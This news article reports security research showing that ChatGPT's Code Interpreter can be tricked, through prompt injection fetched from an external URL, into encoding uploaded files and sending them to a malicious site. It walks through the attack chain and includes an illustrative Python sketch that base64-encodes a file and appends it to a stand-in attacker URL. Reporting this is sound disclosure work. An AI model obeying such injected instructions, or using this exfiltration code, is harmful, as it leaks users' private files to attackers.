New ChatGPT Update Introduces Alarming Security Vulnerabilities – Is Your Data at Risk?

Recent enhancements to ChatGPT, including the introduction of the Code Interpreter, have raised new security concerns, according to research by security expert Johann Rehberger that was subsequently validated by Tom’s Hardware. The vulnerabilities stem from the newly added file-upload capability, part of the recent ChatGPT Plus update.
Among the ChatGPT Plus additions, the Code Interpreter stands out: it can execute Python code and analyze uploaded files, and the update also brings DALL-E image generation. However, these features have inadvertently exposed security flaws. The Code Interpreter runs in a sandboxed environment that has proven susceptible to prompt injection attacks.
The issue builds on a long-standing weakness: an attacker can trick ChatGPT into following instructions fetched from an external URL. Those injected instructions can direct ChatGPT to encode the contents of uploaded files into URL-friendly strings and send the data to a potentially malicious website.
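To make that exfiltration pattern concrete, the Python sketch below is purely illustrative and is not taken from Rehberger's proof of concept; the endpoint and file name are hypothetical placeholders. It shows how a file's contents can be turned into a URL-friendly string and smuggled out as a query parameter on an attacker-controlled URL, which is the general technique the report describes.

```python
import base64
from urllib.parse import quote

# Hypothetical attacker-controlled endpoint (placeholder, not from the article).
EXFIL_URL = "https://attacker.example/collect"

def build_exfil_url(file_path: str) -> str:
    """Encode a file's contents into a URL-friendly string and append it
    to an external URL, mirroring the exfiltration pattern described above."""
    with open(file_path, "rb") as f:
        raw = f.read()
    # Base64 makes arbitrary bytes URL-safe; quote() escapes anything left over.
    encoded = quote(base64.urlsafe_b64encode(raw).decode("ascii"))
    return f"{EXFIL_URL}?data={encoded}"

# If an assistant (or any tool acting on its behalf) is tricked into requesting
# this URL, the uploaded file's contents reach the attacker as a query parameter.
print(build_exfil_url("uploaded_secrets.txt"))  # hypothetical uploaded file
```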
While a successful attack depends on specific conditions, such as the user pasting a malicious URL into ChatGPT, the potential risks are worrisome. The threat could materialize if, for example, a trusted website were compromised to host a malicious prompt, or through social engineering tactics.

[…]
